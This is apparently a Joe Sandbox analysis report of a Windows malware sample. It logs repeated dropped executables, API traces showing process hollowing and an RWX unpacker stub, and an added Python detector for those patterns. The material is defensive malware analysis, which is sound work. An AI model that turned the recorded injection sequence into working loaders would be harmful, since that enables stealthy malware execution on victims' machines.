                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                        Start time:21:31:32
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe"
                                                                                                                                                                                        Imagebase:0x420000
                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                        Start time:21:31:32
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe"
                                                                                                                                                                                        Imagebase:0x420000
                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

Target IDs 37-44: eight further instances of the same dropped executable. All fields except Target ID and start time are identical and are listed once below.

Target ID:37    Start time:21:31:33    Start date:22/12/2023
Target ID:38    Start time:21:31:33    Start date:22/12/2023
Target ID:39    Start time:21:31:33    Start date:22/12/2023
Target ID:40    Start time:21:31:33    Start date:22/12/2023
Target ID:41    Start time:21:31:34    Start date:22/12/2023
Target ID:42    Start time:21:31:34    Start date:22/12/2023
Target ID:43    Start time:21:31:34    Start date:22/12/2023
Target ID:44    Start time:21:31:34    Start date:22/12/2023

Path:C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe"
Imagebase:0x420000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Execution Graph

Execution Coverage:9.9%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:10.6%
Total number of Nodes:208
Total number of Limit Nodes:7

Call chains recovered from the execution graph (node addresses and the API names recorded at each node; edges are shown as ->):

• 401000 -> 40100c VirtualAlloc -> 401073 (stub in the original image)
• 2260000 -> 2260ce8 (calls 2260c63 GetPEB) -> 22633ca -> 2263409 GetVolumeInformationA -> 226098b OpenMutexA -> either 226001b ExitProcess or 22609b3 GetStartupInfoA -> 22609fd -> 2260a02 CreateProcessA -> 2260a12 Wow64GetThreadContext -> 2260a3a VirtualProtectEx -> 2260a65 DuplicateHandle -> 2260aa6 WriteProcessMemory -> 2260ad4 ResumeThread -> 2260ae5 Sleep, OpenMutexA (looped)
• 2260b17 -> 2260ce8 GetPEB -> 2260b50 LoadLibraryA -> 2260b89 -> 2260ba1 OpenProcess -> either 2260bc8 ExitProcess or 2260bd0 -> 22608d7 -> 22608fd -> 2260ce8 GetPEB -> 2260667 -> 22606a0 / 22606e6 / 2260835 (3 API calls each) -> 2260962 -> 2260ce8 GetPEB -> 2260978 Sleep, RtlExitUserThread
• 2260b8f -> 2260ba1 OpenProcess -> 2260bd0 -> 22608d7 (3 API calls) -> 2260bd5 -> 2260c63 GetPEB -> 2260bda
• 2264981 -> 22649d2 CreateEventA -> 22649f5 -> 2264d77 WaitForSingleObject (looped); 2264d49 -> 2264d68 SetEvent
• 2263f2c / 2263f31 -> 2263f4f GetModuleHandleA -> 226403f -> 22640be -> 22639d7 RtlInitializeCriticalSection -> 22639e7 VirtualAlloc -> 226382b VirtualAlloc -> 2263843 CreateThread; alternative path 2263f6a Sleep -> 2263f7a Sleep -> 2263f8a Sleep
• 2263d6a -> 22639d7 (2 API calls) -> 226382b (2 API calls)
• 22634ea lstrlen -> 2262790 -> 2263503 VirtualFree, CloseHandle
• 22631ea -> 226320d lstrcat -> 2263242 GetStartupInfoA, CreateProcessA, CloseHandle, CloseHandle
• 2262951 -> 2263677 -> 2262956 LoadLibraryA -> 2262985 VirtualAlloc -> 22629cf lstrcat -> 2262a06 lstrcat -> 2262a3d lstrcat -> 2262a44 -> 2262aae / 2262af2 / 2262b42 DeleteFileA, 2262b58 Sleep -> 2262b71 -> 2262c65 Sleep (looped)
• 2262f63 -> 2262f6e lstrlen -> 2262f85
• 22638a7 -> 22638ac -> 22638f2 -> 226260c -> 226261a (no API calls recorded)
• 5e0000 VirtualProtect -> 5e034e -> 5e0528 VirtualProtect or 5e06d0 VirtualProtect
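The chain above from 2260a02 to 2260ad4 (CreateProcessA, Wow64GetThreadContext, VirtualProtectEx, DuplicateHandle, WriteProcessMemory, ResumeThread) is the API order of a process-hollowing loader, and the VirtualAlloc at 401064 recorded in the APIs section requests committed PAGE_EXECUTE_READWRITE memory, the usual unpacker-stub pattern. The following added example, which is not part of the Joe Sandbox report or of the sample's code, scans a sandbox-style API trace for both patterns, gating the hollowing rule on CreateProcessA being called with CREATE_SUSPENDED. The trace line format, the process IDs, handle values and most ref addresses are assumptions constructed for the example; only the VirtualAlloc line mirrors the report's API entry.

```python
"""Added example: detect an RWX VirtualAlloc and a suspended-CreateProcessA
hollowing chain in a constructed sandbox-style API trace.  Not part of the
Joe Sandbox report; the trace format below is an assumption."""
import re
from dataclasses import dataclass
from typing import Iterator, List, Optional, Tuple

# Assumed line shape: "<pid> <Api>.<Module>(<hex args>), ref: <hex addr>".
# It mimics the report's "APIs" lines but is not Joe Sandbox's export format.
LINE_RE = re.compile(
    r"^(?P<pid>\d+)\s+(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\)"
    r"(?:,\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?$"
)

MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40
CREATE_SUSPENDED = 0x4  # dwCreationFlags bit, 6th CreateProcessA argument

# Order recorded in the execution graph (nodes 2260a02 .. 2260ad4).
HOLLOWING_SEQUENCE = (
    "CreateProcessA", "Wow64GetThreadContext", "VirtualProtectEx",
    "DuplicateHandle", "WriteProcessMemory", "ResumeThread",
)

# Constructed trace: pids, handles and ref addresses are made up; only the
# first VirtualAlloc line mirrors the report's API entry at 00401064.
SAMPLE_TRACE = """
1234 VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00401064
1234 OpenMutexA.KERNEL32(001F0001,00000000,0019FF10), ref: 02260993
1234 GetStartupInfoA.KERNEL32(0019FE00), ref: 022609B8
1234 CreateProcessA.KERNEL32(00000000,0019FD00,00000000,00000000,00000000,00000004,00000000,00000000,0019FE00,0019FDF0), ref: 02260A0D
1234 Wow64GetThreadContext.KERNEL32(00000134,0019FC00), ref: 02260A20
1234 VirtualProtectEx.KERNEL32(00000130,00400000,00022000,00000040,0019FBF0), ref: 02260A45
1234 DuplicateHandle.KERNEL32(FFFFFFFF,00000130,00000130,0019FBE0,00000000,00000000,00000002), ref: 02260A70
1234 WriteProcessMemory.KERNEL32(00000130,00400000,00420000,00022000,00000000), ref: 02260AB0
1234 ResumeThread.KERNEL32(00000134), ref: 02260ADA
5678 VirtualAlloc.KERNELBASE(00000000,00001000,00003000,00000004), ref: 00401200
5678 CreateProcessA.KERNEL32(00000000,0019FD00,00000000,00000000,00000000,00000000,00000000,00000000,0019FE00,0019FDF0), ref: 00401300
5678 ResumeThread.KERNEL32(00000138), ref: 00401320
"""


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


Call = Tuple[int, str, List[int], Optional[str]]


def parse_trace(text: str) -> Iterator[Call]:
    """Yield (pid, api, args, ref) for every well-formed trace line."""
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            args = [int(a, 16) for a in m["args"].split(",") if a.strip()]
            yield int(m["pid"]), m["api"], args, m["ref"]


def detect(text: str) -> List[Finding]:
    findings: List[Finding] = []
    progress = {}  # pid -> number of HOLLOWING_SEQUENCE steps seen so far
    for pid, api, args, ref in parse_trace(text):
        # Rule 1: committed writable+executable memory (unpacker-stub pattern).
        if api == "VirtualAlloc" and len(args) == 4:
            size, alloc_type, protect = args[1], args[2], args[3]
            if protect == PAGE_EXECUTE_READWRITE and alloc_type & MEM_COMMIT:
                findings.append(Finding(pid, "rwx_alloc",
                    f"VirtualAlloc {size:#x} bytes PAGE_EXECUTE_READWRITE at {ref}"))
        # Rule 2: the hollowing chain, in order, per process.  Unrelated calls
        # in between are ignored; an out-of-order step does not reset it.
        step = progress.get(pid, 0)
        if step < len(HOLLOWING_SEQUENCE) and api == HOLLOWING_SEQUENCE[step]:
            if api == "CreateProcessA" and not (
                len(args) > 5 and args[5] & CREATE_SUSPENDED
            ):
                continue  # child not suspended: not the hollowing pattern
            progress[pid] = step + 1
            if step + 1 == len(HOLLOWING_SEQUENCE):
                findings.append(Finding(pid, "process_hollowing",
                    "suspended CreateProcessA ... ResumeThread chain completed"))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_TRACE):
        print(f"pid {f.pid}: {f.rule}: {f.detail}")
```

Process 5678 in the constructed trace spawns a child without CREATE_SUSPENDED and allocates PAGE_READWRITE memory, so it produces no finding; only process 1234 matches both rules. On a real trace, DuplicateHandle is the step most likely to be missing from other loaders' variants of this chain, so tolerate a skipped step there if you generalise the rule.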

Control-flow Graph

Basic blocks recovered from the control-flow graph of the entry stub (edges shown as ->):

• 401000-401009 -> 40100c-401018 (self-loop)
• 40100c-401018 -> 40101a-40102c -> 40102e-40103d (self-loop)
• 40102e-40103d -> 40103f-401043 (back-edge to 40102e-40103d)
• 40103f-401043 -> 401045-40106e VirtualAlloc, call 401075
• 401045-40106e -> 401073 (self-loop)
APIs
• VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00401064
  (lpAddress=NULL, dwSize=0xA00000 (10 MiB), flAllocationType=0x3000 = MEM_COMMIT|MEM_RESERVE, flProtect=0x40 = PAGE_EXECUTE_READWRITE)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1653862452.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1653848704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_java.jbxd
Similarity
• API ID: AllocVirtual
• String ID: alAl
• API String ID: 4275171209-1316302345
• Opcode ID: f227270a32c0f617dc1efc8abb71a5ab52e3202e42098f1172127993d55cb963
• Instruction ID: 5af7c2372beb94d1e1b866602b7db5847228e6fe9b98f09dddad8bbdacf03bae
                                                                                                                                                                                          • Opcode Fuzzy Hash: f227270a32c0f617dc1efc8abb71a5ab52e3202e42098f1172127993d55cb963
                                                                                                                                                                                          • Instruction Fuzzy Hash: B1015A36A401618FD765CF18C841F41B3E1BF48325F1A81A5D989AB7A2C778FC92CB88
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0226098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 022609A5
                                                                                                                                                                                            • Part of subcall function 0226098B: GetStartupInfoA.KERNEL32(00000000), ref: 022609BD
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0226001D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitInfoMutexOpenProcessStartup
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 213680645-0
                                                                                                                                                                                          • Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                                          • Instruction ID: 018821dbfb8d3565c4018009c9c3f7214208bb4e88274612129ac9bd26566969
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                                          • Instruction Fuzzy Hash: A072D16342E3C14FD7279BE04A6C6757F78BF03208B1D10CBC4819A0BBD6545B99E76A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1653956491.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5e0000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID: $1;$@$C[$R$d:$wJ$y7$v
                                                                                                                                                                                          • API String ID: 544645111-3459585926
                                                                                                                                                                                          • Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                                          • Instruction ID: a8d1d2b531a601f7109a4b1ffc95ff65a13b03a51ff0994c2c6215d850f765d0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 903267B8E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341D775AE85CF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessA.KERNELBASE(00000000,022609F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02260A04
                                                                                                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02260A2C
                                                                                                                                                                                          • VirtualProtectEx.KERNELBASE(?,?,000000EB,00000040,00000000), ref: 02260A57
                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(000000FF,000000FF,?,02265834,00000000,00000000,00000002), ref: 02260A9C
                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,000000EB,00000000), ref: 02260ACA
                                                                                                                                                                                          • ResumeThread.KERNELBASE(?), ref: 02260ADA
                                                                                                                                                                                          • Sleep.KERNELBASE(000003E8), ref: 02260AEA
                                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02260B01
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWow64Write
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1738979855-0
                                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                                          • Instruction ID: c09bd413a69d671c3068c4b69bde5df0d06591151c2550f111c05e6c9db6c104
                                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B3154326502159FEF225F50CC85BA977B8FF04748F0405D4AA49FE0E9DBB09AA0DE54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 479 2263409-2263462 GetVolumeInformationA call 2263634
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetVolumeInformationA.KERNELBASE(02263405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 02263409
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                                          • Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                                          • Instruction ID: 4c4363e9401d7ce29dd3ff6ff61f410553fc441be3b3e610dd4644be9fdd41d3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29F0FE75500154DBEF02EF24C485A9A77F8AF44344F4504C8AA4DBF206CA709595CFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8ea4e0c3cf8ecf2bfa90a777e44b91728a4d3afd2e27c35c42be2dc60894fdda
                                                                                                                                                                                          • Instruction ID: f462f393f1e838e75aae57660c309a560d8334809746bee654342f66c26e16b7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ea4e0c3cf8ecf2bfa90a777e44b91728a4d3afd2e27c35c42be2dc60894fdda
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58C1D6264246878EE7158AA8C05D3F2BFD5BB12318F489389C19D4F3DBC399A1E9C7D1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0d754edaa701a15154bb9a4648fd9545ba8bd32677100c0784a8600ca5aed839
                                                                                                                                                                                          • Instruction ID: f482395870cdbbdf57aa0e7b31be2b0ba2647f55f0b1eda4d3bd01f74ce1dcda
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d754edaa701a15154bb9a4648fd9545ba8bd32677100c0784a8600ca5aed839
                                                                                                                                                                                          • Instruction Fuzzy Hash: 76B1F8225647878AE7258A98C01D3F2BF957B12328F0893C9C59D0F3E7C3A5A2D9D7C1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2260000_java.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
• API String ID:
• Opcode ID: f1cf879b00919bdefd480fb5a14bd237a5ae1218ef57fef6b742790238e8c1a6
• Instruction ID: 42e687cab3e91ba0d79e64a924876dbe3662425e574637ff4c7bfcf9c0ac2d6e
• Opcode Fuzzy Hash: f1cf879b00919bdefd480fb5a14bd237a5ae1218ef57fef6b742790238e8c1a6
• Instruction Fuzzy Hash: 77D0C579661550CFCA56CB58C1D8E10B3B2FB48764B168495E80A8B766C335ED46DE00
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(02262949,00000008,?,00000000,02262835,00000000), ref: 02262956
• VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 02262993
• lstrcat.KERNEL32(00000000,022629C1), ref: 022629D0
• lstrcat.KERNEL32(00000000,022629F8), ref: 02262A07
• lstrcat.KERNEL32(00000000,02262A2F), ref: 02262A3E
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02262AB8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02262AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02262B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02262B66
Memory Dump Source
• Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2260000_java.jbxd
Similarity
• API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
• String ID:
• API String ID: 675344582-0
• Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
• Instruction ID: 07d130e1ca34181be00982cb756b639c9df27b9fac1c3c258489fe499713d2af
• Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
• Instruction Fuzzy Hash: 7D517073410354DEDB22AFB08D4CFBB76BDEF40705F0405A5AE45EA049DA758AC0CEA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• lstrcat.KERNEL32(00000000,022629C1), ref: 022629D0
  • Part of subcall function 02262A01: lstrcat.KERNEL32(00000000,022629F8), ref: 02262A07
  • Part of subcall function 02262A01: lstrcat.KERNEL32(00000000,02262A2F), ref: 02262A3E
  • Part of subcall function 02262A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02262AB8
  • Part of subcall function 02262A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02262AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02262B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02262B66
Memory Dump Source
• Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2260000_java.jbxd
Similarity
• API ID: DeleteFilelstrcat$Sleep
• String ID:
• API String ID: 588723932-0
• Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
• Instruction ID: 17294a9b2a76e5e78d438cc7d3f71aed0829c459954961c3e9469c4f59d27bb6
• Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
• Instruction Fuzzy Hash: CC414273410355DEDB22AFB08D4CFBB72BDEF40709F4406A5AE45EA049DA759AC0CEA4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• lstrcat.KERNEL32(00000000,022629F8), ref: 02262A07
  • Part of subcall function 02262A38: lstrcat.KERNEL32(00000000,02262A2F), ref: 02262A3E
  • Part of subcall function 02262A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02262AB8
  • Part of subcall function 02262A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02262AFC
  • Part of subcall function 02262A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02262B52
  • Part of subcall function 02262A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02262B66
Memory Dump Source
• Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2260000_java.jbxd
Similarity
• API ID: DeleteFile$lstrcat$Sleep
• String ID:
• API String ID: 4261675396-0
• Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction ID: 6e226367b48c5ded2eeb53e6b818fa1be9f6da486c323f5eb96658b9d67f9a8c
• Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction Fuzzy Hash: AA413273410359DEDB22AFB08D4CFBB76BDEF40705F4005A5AE85EA058DA759AC0CEA4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• lstrcat.KERNEL32(00000000,02262A2F), ref: 02262A3E
  • Part of subcall function 02262B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 02262C68
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02262AB8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02262AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02262B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02262B66
Memory Dump Source
• Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2260000_java.jbxd
Similarity
• API ID: DeleteFile$Sleep$lstrcat
• String ID:
• API String ID: 531250245-0
• Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction ID: 8fac7f62e47a046336325b515c200622254cc6718993968ddf70090f6a3af4ed
• Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction Fuzzy Hash: 2A313E72410259DEDB226EB08D4CFBB76BCEF40709F4006A5AE45EA058DA3599C0CEA4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• lstrcat.KERNEL32(00000000,00000000), ref: 0226320E
• GetStartupInfoA.KERNEL32(00000000), ref: 0226324C
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,022631D9,00000011,?,00000000,00000000), ref: 02263279
• CloseHandle.KERNEL32(?,?,022631D9,00000011,?,00000000,00000000,00000000,02263092,00000004,00000000), ref: 02263285
• CloseHandle.KERNEL32(?,?,022631D9,00000011,?,00000000,00000000,00000000,02263092,00000004,00000000), ref: 02263291
Memory Dump Source
• Source File: 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2260000_java.jbxd
Similarity
• API ID: CloseHandle$CreateInfoProcessStartuplstrcat
• String ID:
• API String ID: 3387338972-0
• Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
• Instruction ID: f615e30daafb3de9f649663f9ab0fa1c254c66a50b6cbd94df7f4dcf74960c49
• Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
• Instruction Fuzzy Hash: 031112728106189FDF12ABA0CC88AAEB7BDEF50706F054595E985EA048DA705A90CEA5
